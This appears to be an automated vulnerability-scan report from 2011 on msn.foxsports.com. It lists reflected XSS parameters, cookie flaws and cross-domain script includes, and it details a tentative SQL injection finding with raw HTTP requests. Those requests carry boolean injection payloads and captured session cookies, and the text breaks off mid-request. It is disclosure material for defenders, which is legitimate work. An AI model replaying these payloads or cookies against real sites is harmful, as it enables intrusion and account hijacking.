msn.foxsports.com, XSS, Cross Site Scripting, CWE-79, CAPEC-86

XSS in msn.foxsports.com | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Fri Jan 07 20:38:06 CST 2011.


CWE-79 Report by Hoyt LLC Research

XSS.CX Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

1. SQL injection

2. LDAP injection

3. Cross-site scripting (reflected)

3.1. http://msn.foxsports.com/account/transition [egs parameter]

3.2. http://msn.foxsports.com/account/transition [esefsuid parameter]

3.3. http://msn.foxsports.com/account/transition [fu parameter]

3.4. http://msn.foxsports.com/account/transition [initiatingAction parameter]

3.5. http://msn.foxsports.com/account/transition [ts parameter]

3.6. http://msn.foxsports.com/boxing/gallery [name of an arbitrarily supplied request parameter]

3.7. http://msn.foxsports.com/boxing/odds/moneyline [REST URL parameter 3]

3.8. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611 [gt1 parameter]

3.9. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611 [name of an arbitrarily supplied request parameter]

3.10. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611 [name of an arbitrarily supplied request parameter]

3.11. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby- [name of an arbitrarily supplied request parameter]

3.12. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611 [name of an arbitrarily supplied request parameter]

3.13. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343 [name of an arbitrarily supplied request parameter]

3.14. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611 [name of an arbitrarily supplied request parameter]

3.15. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [gt1 parameter]

3.16. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610 [name of an arbitrarily supplied request parameter]

3.17. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [gt1 parameter]

3.18. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611 [name of an arbitrarily supplied request parameter]

3.19. http://msn.foxsports.com/other/page/fox-flash [vid parameter]

3.20. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

3.21. http://msn.foxsports.com/search [name of an arbitrarily supplied request parameter]

3.22. http://msn.foxsports.com/search [sp_q parameter]

3.23. http://msn.foxsports.com/video [vid parameter]

3.24. http://msn.foxsports.com/video/NFL [vid parameter]

3.25. http://msn.foxsports.com/video/college-football [vid parameter]

3.26. http://msn.foxsports.com/video/shows/what-the-fox [vid parameter]

4. Flash cross-domain policy

5. Session token in URL

6. Open redirection

7. Cookie scoped to parent domain

7.1. http://msn.foxsports.com/account/logout

7.2. http://msn.foxsports.com/account/verify

7.3. http://msn.foxsports.com/fantasy/basketball/hotstreak/

7.4. http://msn.foxsports.com/fantasy/football/frankspicks/

8. Cookie without HttpOnly flag set

8.1. http://msn.foxsports.com/account/logout

8.2. http://msn.foxsports.com/account/regPopup

8.3. http://msn.foxsports.com/account/register

8.4. http://msn.foxsports.com/account/transition

8.5. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

8.6. http://msn.foxsports.com/fantasy/collegefootball/pickem/

8.7. http://msn.foxsports.com/account/verify

8.8. http://msn.foxsports.com/fantasy/basketball/hotstreak/

8.9. http://msn.foxsports.com/fantasy/football/frankspicks/

9. Password field with autocomplete enabled

9.1. http://msn.foxsports.com/account/regPopup

9.2. http://msn.foxsports.com/account/register

10. Cross-domain Referer leakage

10.1. http://msn.foxsports.com/

10.2. http://msn.foxsports.com/

10.3. http://msn.foxsports.com/

10.4. http://msn.foxsports.com/account/register

10.5. http://msn.foxsports.com/account/transition

10.6. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

10.7. http://msn.foxsports.com/collegefootball/gameTrax

10.8. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

10.9. http://msn.foxsports.com/fantasy/basketball/hotstreak/

10.10. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

10.11. http://msn.foxsports.com/fantasy/collegefootball/pickem/

10.12. http://msn.foxsports.com/fantasy/football/frankspicks/

10.13. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

10.14. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

10.15. http://msn.foxsports.com/morenews

10.16. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211/

10.17. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711/

10.18. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711/

10.19. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

10.20. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

10.21. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611

10.22. http://msn.foxsports.com/other/page/fox-flash

10.23. http://msn.foxsports.com/search

10.24. http://msn.foxsports.com/search

10.25. http://msn.foxsports.com/search

10.26. http://msn.foxsports.com/search

10.27. http://msn.foxsports.com/search

10.28. http://msn.foxsports.com/search

10.29. http://msn.foxsports.com/search

10.30. http://msn.foxsports.com/search

10.31. http://msn.foxsports.com/search

10.32. http://msn.foxsports.com/search

10.33. http://msn.foxsports.com/search

10.34. http://msn.foxsports.com/search

10.35. http://msn.foxsports.com/search

10.36. http://msn.foxsports.com/search

10.37. http://msn.foxsports.com/search

10.38. http://msn.foxsports.com/search

10.39. http://msn.foxsports.com/video

10.40. http://msn.foxsports.com/video/NFL

10.41. http://msn.foxsports.com/video/college-football

10.42. http://msn.foxsports.com/video/shows/inside-call

10.43. http://msn.foxsports.com/video/shows/picknation

10.44. http://msn.foxsports.com/video/shows/what-the-fox

11. Cross-domain script include

11.1. http://msn.foxsports.com/

11.2. http://msn.foxsports.com/account/transition

11.3. http://msn.foxsports.com/boxing

11.4. http://msn.foxsports.com/boxing/gallery

11.5. http://msn.foxsports.com/boxing/list-gallery

11.6. http://msn.foxsports.com/boxing/odds/moneyline

11.7. http://msn.foxsports.com/boxing/photo-gallery

11.8. http://msn.foxsports.com/boxing/story/Boxing-champions-031510

11.9. http://msn.foxsports.com/boxing/story/Mike-Tyson-shares-love-of-pigeons-in-new-Animal-Planet-show-010611

11.10. http://msn.foxsports.com/boxing/story/boxing-schedule-031510

11.11. http://msn.foxsports.com/collegebasketball

11.12. http://msn.foxsports.com/collegebasketball/list-gallery

11.13. http://msn.foxsports.com/collegebasketball/odds/spread

11.14. http://msn.foxsports.com/collegebasketball/page/John-Wooden-1910-2010

11.15. http://msn.foxsports.com/collegebasketball/photo-gallery

11.16. http://msn.foxsports.com/collegebasketball/polls

11.17. http://msn.foxsports.com/collegebasketball/powerRankings

11.18. http://msn.foxsports.com/collegebasketball/schedule

11.19. http://msn.foxsports.com/collegebasketball/scores

11.20. http://msn.foxsports.com/collegebasketball/standings

11.21. http://msn.foxsports.com/collegebasketball/stats

11.22. http://msn.foxsports.com/collegebasketball/teams

11.23. http://msn.foxsports.com/collegefootball

11.24. http://msn.foxsports.com/collegefootball/gameTrax

11.25. http://msn.foxsports.com/collegefootball/list-gallery

11.26. http://msn.foxsports.com/collegefootball/odds/spread

11.27. http://msn.foxsports.com/collegefootball/photo-gallery

11.28. http://msn.foxsports.com/collegefootball/polls

11.29. http://msn.foxsports.com/collegefootball/powerRankings

11.30. http://msn.foxsports.com/collegefootball/schedule

11.31. http://msn.foxsports.com/collegefootball/scores

11.32. http://msn.foxsports.com/collegefootball/standings

11.33. http://msn.foxsports.com/collegefootball/stats

11.34. http://msn.foxsports.com/collegefootball/story/BCS-Bowl-Games-Schedule-2010-2011

11.35. http://msn.foxsports.com/collegefootball/story/Stanford-Cardinal-Andrew-Luck-to-come-back-for-another-season-010611

11.36. http://msn.foxsports.com/collegefootball/teams

11.37. http://msn.foxsports.com/fantasy

11.38. http://msn.foxsports.com/fantasy/baseball

11.39. http://msn.foxsports.com/fantasy/basketball/hotstreak/

11.40. http://msn.foxsports.com/fantasy/collegefootball/bowlpickem/

11.41. http://msn.foxsports.com/fantasy/collegefootball/pickem/

11.42. http://msn.foxsports.com/fantasy/football

11.43. http://msn.foxsports.com/fantasy/football/draftguide

11.44. http://msn.foxsports.com/fantasy/football/frankspicks/

11.45. http://msn.foxsports.com/fantasy/football/page/chat-index

11.46. http://msn.foxsports.com/fantasy/sports-games

11.47. http://msn.foxsports.com/fcs

11.48. http://msn.foxsports.com/feedback

11.49. http://msn.foxsports.com/foxsoccer

11.50. http://msn.foxsports.com/foxsoccer/championsleague

11.51. http://msn.foxsports.com/foxsoccer/england

11.52. http://msn.foxsports.com/foxsoccer/euro2012qualifying

11.53. http://msn.foxsports.com/foxsoccer/europe

11.54. http://msn.foxsports.com/foxsoccer/latinamerica

11.55. http://msn.foxsports.com/foxsoccer/premierleague

11.56. http://msn.foxsports.com/foxsoccer/tvschedule

11.57. http://msn.foxsports.com/foxsoccer/usa

11.58. http://msn.foxsports.com/fssearch

11.59. http://msn.foxsports.com/golf

11.60. http://msn.foxsports.com/golf/leaderboard

11.61. http://msn.foxsports.com/golf/list-gallery

11.62. http://msn.foxsports.com/golf/page/Tiger-Woods-Elin-Nordegren-divorce-official-golfer-sex-scandal

11.63. http://msn.foxsports.com/golf/photo-gallery

11.64. http://msn.foxsports.com/golf/schedule

11.65. http://msn.foxsports.com/golf/story/Tiger-Woods-ends-13-year-relationship-with-Golf-Digest-010611

11.66. http://msn.foxsports.com/home/page/fsn

11.67. http://msn.foxsports.com/horseracing

11.68. http://msn.foxsports.com/horseracing/story/the-road-to-the-2010-kentucky-derby-

11.69. http://msn.foxsports.com/list-gallery

11.70. http://msn.foxsports.com/mlb

11.71. http://msn.foxsports.com/mlb/injuries

11.72. http://msn.foxsports.com/mlb/list-gallery

11.73. http://msn.foxsports.com/mlb/odds/spread

11.74. http://msn.foxsports.com/mlb/photo-gallery

11.75. http://msn.foxsports.com/mlb/players

11.76. http://msn.foxsports.com/mlb/powerRankings

11.77. http://msn.foxsports.com/mlb/schedule

11.78. http://msn.foxsports.com/mlb/scores

11.79. http://msn.foxsports.com/mlb/standings

11.80. http://msn.foxsports.com/mlb/stats

11.81. http://msn.foxsports.com/mlb/story/Astros-infielder-Keppinger-to-have-foot-surgery-48484608

11.82. http://msn.foxsports.com/mlb/story/Chicago-Cubs-close-to-landing-Matt-Garza-from-Tampa-Bay-Rays-010711

11.83. http://msn.foxsports.com/mlb/story/Free_Agent_Signings_80923322

11.84. http://msn.foxsports.com/mlb/story/Remaining-Free-Agents-List

11.85. http://msn.foxsports.com/mlb/story/Salary-Arbitration-Eligibles-List

11.86. http://msn.foxsports.com/mlb/story/gay-boston-herald-sportswriter-comes-out-in-column-010611

11.87. http://msn.foxsports.com/mlb/teams

11.88. http://msn.foxsports.com/mlb/transactions

11.89. http://msn.foxsports.com/mma/odds/moneyline

11.90. http://msn.foxsports.com/morenews

11.91. http://msn.foxsports.com/motor

11.92. http://msn.foxsports.com/motor/f1

11.93. http://msn.foxsports.com/motor/f1/drivers

11.94. http://msn.foxsports.com/motor/f1/results

11.95. http://msn.foxsports.com/motor/f1/schedule

11.96. http://msn.foxsports.com/motor/f1/standings

11.97. http://msn.foxsports.com/motor/irl/drivers

11.98. http://msn.foxsports.com/motor/irl/results

11.99. http://msn.foxsports.com/motor/irl/schedule

11.100. http://msn.foxsports.com/motor/irl/standings

11.101. http://msn.foxsports.com/nascar

11.102. http://msn.foxsports.com/nascar/cup/drivers

11.103. http://msn.foxsports.com/nascar/cup/raceTrax

11.104. http://msn.foxsports.com/nascar/cup/results

11.105. http://msn.foxsports.com/nascar/cup/schedule

11.106. http://msn.foxsports.com/nascar/cup/standings

11.107. http://msn.foxsports.com/nascar/cup/stats

11.108. http://msn.foxsports.com/nascar/list-gallery

11.109. http://msn.foxsports.com/nascar/page/AllWaltrip-Darrell-Waltrip-NASCAR-on-FOX

11.110. http://msn.foxsports.com/nascar/photo-gallery

11.111. http://msn.foxsports.com/nascar/powerRankings

11.112. http://msn.foxsports.com/nascar/tracks

11.113. http://msn.foxsports.com/nba

11.114. http://msn.foxsports.com/nba/draft-central

11.115. http://msn.foxsports.com/nba/injuries

11.116. http://msn.foxsports.com/nba/list-gallery

11.117. http://msn.foxsports.com/nba/odds/spread

11.118. http://msn.foxsports.com/nba/page/LeBron-James-free-agency-watch-summer-2010

11.119. http://msn.foxsports.com/nba/page/NBA-Playoff-Central

11.120. http://msn.foxsports.com/nba/page/heat-or-threepeat

11.121. http://msn.foxsports.com/nba/photo-gallery

11.122. http://msn.foxsports.com/nba/players

11.123. http://msn.foxsports.com/nba/powerRankings

11.124. http://msn.foxsports.com/nba/schedule

11.125. http://msn.foxsports.com/nba/scores

11.126. http://msn.foxsports.com/nba/standings

11.127. http://msn.foxsports.com/nba/stats

11.128. http://msn.foxsports.com/nba/story/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611

11.129. http://msn.foxsports.com/nba/teams

11.130. http://msn.foxsports.com/nba/transactions

11.131. http://msn.foxsports.com/nfl

11.132. http://msn.foxsports.com/nfl/draft-central

11.133. http://msn.foxsports.com/nfl/draft-tracker

11.134. http://msn.foxsports.com/nfl/gallery

11.135. http://msn.foxsports.com/nfl/injuries

11.136. http://msn.foxsports.com/nfl/list-gallery

11.137. http://msn.foxsports.com/nfl/odds/spread

11.138. http://msn.foxsports.com/nfl/page/Jay-Glazer-NFL-insider-NFL-on-FOX-Glazers-Edge

11.139. http://msn.foxsports.com/nfl/page/Super-Bowl-XLV-from-Cowboys-Stadium-airs-on-FOX-February-6-2011

11.140. http://msn.foxsports.com/nfl/photo-gallery

11.141. http://msn.foxsports.com/nfl/players

11.142. http://msn.foxsports.com/nfl/powerRankings

11.143. http://msn.foxsports.com/nfl/schedule

11.144. http://msn.foxsports.com/nfl/scores

11.145. http://msn.foxsports.com/nfl/standings

11.146. http://msn.foxsports.com/nfl/stats

11.147. http://msn.foxsports.com/nfl/story/Jason-Garrett-Dallas-Cowboys-head-coach-010611

11.148. http://msn.foxsports.com/nfl/story/Jets-Sanchez-saddened-by-death-of-young-fan-38755343

11.149. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211

11.150. http://msn.foxsports.com/nfl/story/NFL-coaches-hired-fired-interim-carousel-rumors-010211/

11.151. http://msn.foxsports.com/nfl/story/NFL-playoff-picture-scenarios-2010

11.152. http://msn.foxsports.com/nfl/story/NFL-playoffs-offer-test-of-focus-on-illegal-hits-33294493

11.153. http://msn.foxsports.com/nfl/story/Ravens-Ed-Reed-brother-wanted-by-police-010711

11.154. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711

11.155. http://msn.foxsports.com/nfl/story/jeff-fisher-tennessee-titans-remains-head-coach-010711/

11.156. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711

11.157. http://msn.foxsports.com/nfl/story/jim-harbaugh-san-francisco-49ers-agree-to-coach-010711/

11.158. http://msn.foxsports.com/nfl/story/miami-dolphins-tony-sparano-jim-harbaugh-retain-head-coach-010611

11.159. http://msn.foxsports.com/nfl/story/new-york-giants-coach-tom-coughlin-tells-off-critics-010611

11.160. http://msn.foxsports.com/nfl/story/new-york-jets-coach-rex-ryan-just-looks-foolish-NFL-playoffs-010711

11.161. http://msn.foxsports.com/nfl/story/ray-rice-baltimore-ravens-will-beat-kansas-city-chiefs-jamaal-charles-010711

11.162. http://msn.foxsports.com/nfl/teams

11.163. http://msn.foxsports.com/nfl/transactions

11.164. http://msn.foxsports.com/nfl/weeklyLeaders

11.165. http://msn.foxsports.com/nhl

11.166. http://msn.foxsports.com/nhl/dailyLeaders

11.167. http://msn.foxsports.com/nhl/injuries

11.168. http://msn.foxsports.com/nhl/list-gallery

11.169. http://msn.foxsports.com/nhl/odds/moneyline

11.170. http://msn.foxsports.com/nhl/photo-gallery

11.171. http://msn.foxsports.com/nhl/players

11.172. http://msn.foxsports.com/nhl/powerRankings

11.173. http://msn.foxsports.com/nhl/schedule

11.174. http://msn.foxsports.com/nhl/scores

11.175. http://msn.foxsports.com/nhl/stats

11.176. http://msn.foxsports.com/nhl/story/Unruly-Russian-hockey-team-kicked-off-flight-010610

11.177. http://msn.foxsports.com/nhl/teams

11.178. http://msn.foxsports.com/nhl/transactions

11.179. http://msn.foxsports.com/olympics

11.180. http://msn.foxsports.com/olympics/list-gallery

11.181. http://msn.foxsports.com/other/gallery/Week-in-sports-photos-010611

11.182. http://msn.foxsports.com/other/page/Incomplete-coverage-babes-cheerleaders-hotties-dancers-models-bikini-girls-and-more

11.183. http://msn.foxsports.com/other/page/fox-flash

11.184. http://msn.foxsports.com/other/page/privacy-policy

11.185. http://msn.foxsports.com/other/page/terms-of-use

11.186. http://msn.foxsports.com/photo-gallery

11.187. http://msn.foxsports.com/press

11.188. http://msn.foxsports.com/rssfeeds

11.189. http://msn.foxsports.com/siteIndex

11.190. http://msn.foxsports.com/tennis

11.191. http://msn.foxsports.com/tennis/gallery

11.192. http://msn.foxsports.com/tennis/players

11.193. http://msn.foxsports.com/tennis/rank

11.194. http://msn.foxsports.com/tennis/results

11.195. http://msn.foxsports.com/tennis/schedule

11.196. http://msn.foxsports.com/tv/schedule

11.197. http://msn.foxsports.com/video

11.198. http://msn.foxsports.com/video-central

11.199. http://msn.foxsports.com/video/Golf

11.200. http://msn.foxsports.com/video/MLB

11.201. http://msn.foxsports.com/video/MMA_Boxing

11.202. http://msn.foxsports.com/video/NASCAR

11.203. http://msn.foxsports.com/video/NBA

11.204. http://msn.foxsports.com/video/NFL

11.205. http://msn.foxsports.com/video/NHL

11.206. http://msn.foxsports.com/video/Olympics

11.207. http://msn.foxsports.com/video/Tennis

11.208. http://msn.foxsports.com/video/college-football

11.209. http://msn.foxsports.com/video/most-watched

11.210. http://msn.foxsports.com/video/shows

11.211. http://msn.foxsports.com/video/shows/afterparty

11.212. http://msn.foxsports.com/video/shows/big-12

11.213. http://msn.foxsports.com/video/shows/club-wpt

11.214. http://msn.foxsports.com/video/shows/coach-speak

11.215. http://msn.foxsports.com/video/shows/college-experiment

11.216. http://msn.foxsports.com/video/shows/cosmic-schein

11.217. http://msn.foxsports.com/video/shows/cubed

11.218. http://msn.foxsports.com/video/shows/cubed&from=foxsports/home/moresports

11.219. http://msn.foxsports.com/video/shows/inside-call

11.220. http://msn.foxsports.com/video/shows/lunch-with-benefits

11.221. http://msn.foxsports.com/video/shows/mlb-on-fox

11.222. http://msn.foxsports.com/video/shows/nfl-on-fox

11.223. http://msn.foxsports.com/video/shows/online-ot

11.224. http://msn.foxsports.com/video/shows/pac-10

11.225. http://msn.foxsports.com/video/shows/picknation

11.226. http://msn.foxsports.com/video/shows/what-the-fox

11.227. http://msn.foxsports.com/wcbk/polls

11.228. http://msn.foxsports.com/wcbk/schedule

11.229. http://msn.foxsports.com/wcbk/scores

11.230. http://msn.foxsports.com/wcbk/stats

11.231. http://msn.foxsports.com/wnba/schedule

11.232. http://msn.foxsports.com/wnba/scores

11.233. http://msn.foxsports.com/wnba/standings

11.234. http://msn.foxsports.com/wnba/stats

11.235. http://msn.foxsports.com/writer/Alex_Marvez

11.236. http://msn.foxsports.com/writer/Bill_Reiter

11.237. http://msn.foxsports.com/writer/Brian_Lowry

11.238. http://msn.foxsports.com/writer/Jason_Whitlock

11.239. http://msn.foxsports.com/writer/Jay_Glazer

11.240. http://msn.foxsports.com/writer/Jeff_Goodman

11.241. http://msn.foxsports.com/writer/Ken_Rosenthal

11.242. http://msn.foxsports.com/writer/Lee_Spencer

11.243. http://msn.foxsports.com/writer/Mark_Kriegel

11.244. http://msn.foxsports.com/writer/Peter_Schrager

11.245. http://msn.foxsports.com/writer/Robert_Lusetich

11.246. http://msn.foxsports.com/writer/Thayer_Evans

12. Email addresses disclosed

12.1. http://msn.foxsports.com/account/regPopup

12.2. http://msn.foxsports.com/feedback

12.3. http://msn.foxsports.com/nba/story/david-stern-talks-lebron-james-contraction-tattoos-with-jason-whitlock-010611

12.4. http://msn.foxsports.com/other/page/privacy-policy

12.5. http://msn.foxsports.com/other/page/terms-of-use

12.6. http://msn.foxsports.com/search

12.7. http://msn.foxsports.com/video/shows/afterparty

12.8. http://msn.foxsports.com/video/shows/coach-speak

12.9. http://msn.foxsports.com/video/shows/college-experiment

12.10. http://msn.foxsports.com/video/shows/cubed

12.11. http://msn.foxsports.com/video/shows/cubed&from=foxsports/home/moresports

12.12. http://msn.foxsports.com/writer/Jason_Whitlock

12.13. http://msn.foxsports.com/writer/Peter_Schrager

13. Content type incorrectly stated

13.1. http://msn.foxsports.com/account/resetPassword

13.2. http://msn.foxsports.com/emailLink

13.3. http://msn.foxsports.com/user.js

14. Content type is not specified



1. SQL injection  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://msn.foxsports.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13403961'%20or%201%3d1--%20 and 13403961'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

Request 1

GET /search?sp_q=nascar_news&113403961'%20or%201%3d1--%20=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: p11Kicks=7hfkkH5SN2ZnN488gKPP/GoXgOjDHl8RHLhCy3k7srsMr93kN8jrjbj3JgOI//CNZNiPHqQknRCMrKkIfl/N5YzzG16dog5fbW9kcCerWKOn5ROJwytkLTvZ4ryWzh+op2eMu5KhEdM/Jtq0Zg+GjMvR2anBaMaD; JSESSIONID=36BDC67738B7CE6D05539ED00BC46055; pALERTED=TRUE; pLMD="2011-01-08 00:30:34"; pENC_LNAME=/wgeX1XilBI=; glt_2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25=LT1_wYGVkkgCTuOFWv1NpFDEqA%3D%3D; pRME=; UnicaNIODID=I7HpnSWrYC7-Ww6qltH; pUID=/k94ON71KoD/EYqOMDzIDg==; pENC_FNAME=Z1NVLTXWY1w=; _gig_mig=1; pEFSUID=/k94ON71KoD/EYqOMDzIDg==; pWHATIFSPORTS=0457nhtCFA3t1jis7tppnQYRYQCN6bXOVFUsoFcZ9DFjABAPjYGpxDMI976pCTsSgbHPbKqUUcAnnVgwH4WLWIw22dkifhqeveh7yGKiUBlCUggy9jwYGLPwO4g2/2TaHI5aWd5N/U6TrAz4oiqCRNr9VH15cFkq7VpqEGMPu4ZQoCd8JiazfhiCz19aE8Rr96avqbADey4zfxh7OCe3ARE45iIC+SoOO4zwo+2imw1wriyE/gxP7lCgJ3wmJrN+KsXLdMDxGLAaQBnEGrlvs9ds+BKO8cGA+0bSRs6mbTfXoJRF4HgeglEUizR3jzAIsqs4dxIjPEOir71y3OLemXi49kGaq/9vS2x2YKiW+hc=; NetInsightSessionID=1; _chartbeat2=oxy92bi233plhtq3; pExternalUser=; MUID=65AFF4B77A124856A6B4337A160FA285; pSTATS=oKMikaeXnadVXvheCgqv4qQGkvW5KkX7zWw6zIUiOwvlI5/OUGVvoWTXFJpBNWzQWVqOGmQZlvBCESj72haC4/OzY40LwV+YVr8L9ReeU4T3lYhQ6KEyPw/L10QuMbosYM5aXgrRZt1Yuvg4rb1Hi9aLTkInIxcA; pENC_EMAIL=s3nN+QCME4PqzMAvdLX63Yi++Emnqjmo; pFANTASYMOGULS=Jeypi2HA88QREMq/XrW5W6uaqRGCAMb+/M+ZzLvMJQSwaQW+febL4rpIIS10epmqgh/UVs1iVta0QPbQGbW+zEajyFiaJOKRs7miETBZyarJr1nY/ID/k8yxImY14QfLYp4Fx861z1PvhtTsTCo9nHhiJENEhksH9YgRXJ3iI3Kh8JguNeuK3N/eAzA+OMKstnepVvExJrs9ImjZI/XRI4JGRpFqkQEyAknAUiFBw280mu4h97153zkgZC3pprU0kHjSy1+3H8fa9C2mVIy0IJVI54TMoAqj8gf392S0Ozlcvob3U3YSfYf+fg80kwtJC6EWBz0qFcsMIR3IXQd90zjrRj+j6Il/bU36Pj1bI8A2Yml8HCRZs21N+j49WyPAFq4+ZdtreA4wf3lPSso/Mg==; pONESITE=wECUR3DVfAatOJ2BuE9nEIJ6iKhzw1J1DqpfIMqe8p8sMuelq5ptJXgFJkbkdTcy6v1ljz5hnRsOHtn/ORHunKGA9azvOKsjnlQl5+vANAphEHPO/TfA0gs0xGbwCkp2ZlHn80Wwjmy12/lA2yGCayQM/yxBkVKtmpMGzs5noanJHgnnsREscBsew5UDzLAY6u9XpfOLODoWeR/uovPQww==; pOPENSPORTS=KpKIL1M1Ag7Mu56rLIpMyH5Q0qTa5gwvuojCbFPQ5dB7rEdoiBUsOZlngCkKK0BShV4DtJ2fNgytwuhWqePhap9UWmxXoUrCerKsn/KNhssOwxf4JASIw7xwKkdd2uRnrbDV+1X03Zn6t+4KfItlF+qMzS6uOiVeU6ksPSqGW24b8A0Qgsz0zHhcvIriUhBbXXZQZk+4OsNItgO/YFsefQ0ZpEPEFd4z/5NzIdmRx4jPjxBJhyGQVqVwnQrzIpurXvOhNehzUUSKsb6SUNh4BjCSV5eyYXhZ;

Response 1

HTTP/1.1 200 OK
Server: PWS/1.7.1.2
Content-Length: 50895
Content-Type: text/html;charset=UTF-8
X-Px: ms iad-agg-n31 ( iad-agg-n25), ms iad-agg-n25 ( jfk-agg-n25), ms jfk-agg-n25 ( origin>CONN)
Cache-Control: max-age=3584
Expires: Sat, 08 Jan 2011 02:08:55 GMT
Date: Sat, 08 Jan 2011 01:09:11 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<META http-equiv="Content-Type" conten
...[SNIP]...
<ol scriptid="353778712945" class="ez-mod-content">
<li class="ez-itemMod-item ez-Video ez-first ez-col ez-col-first ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: Waiting for 'Dega" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news"><img src="http://img2.catalog.video.msn.com/image.aspx?uuid=5378e33e-c227-468a-b4a0-a9a2c623d712&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/34799455/under-the-hood-waiting-for-dega.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: Waiting for 'Dega </a>
<div class="ez-meta"></div>
<p class="ez-desc">Why is Talladega on the mind of Jimmie Johnson? FOXSports.com's Lee Spencer has the latest NASCAR news.</p>
</div>
<div class="ez-clearingDiv"></div>
</li>
<li class="ez-itemMod-item ez-Video ez-col ez-col-last ez-item-dynamic-snippets ">
<div class="ez-thumbs">
<a title="Under the Hood: What's the Problem?" target="" rel="nofollow" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news"><img src="http://img5.catalog.video.msn.com/image.aspx?uuid=6c65fe5b-0c18-4ec6-80b3-89d405604f7a&w=136&h=102" class="ez-primaryThumb"></a>
</div>
<div class="ez-main">
<a target="" onclick="EZDATA.trackGaEvent('search', 'navigation', 'internal');" href="http://multimedia.foxsports.com/m/video/33661444/under-the-hood-what-s-the-problem.htm?q=nascar_news" galabel="internal" class="ez-title">Under the Hood: What's the Problem? </a>
<div class="ez-meta"></div>
<p class="ez-desc">
<b>&#133; </b>area and. Under our league gets out thanks for joining us and remember foxsports.com. Has you covered for all your <
...[SNIP]...

Request 2

GET /search?sp_q=nascar_news&113403961'%20or%201%3d2--%20=1 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
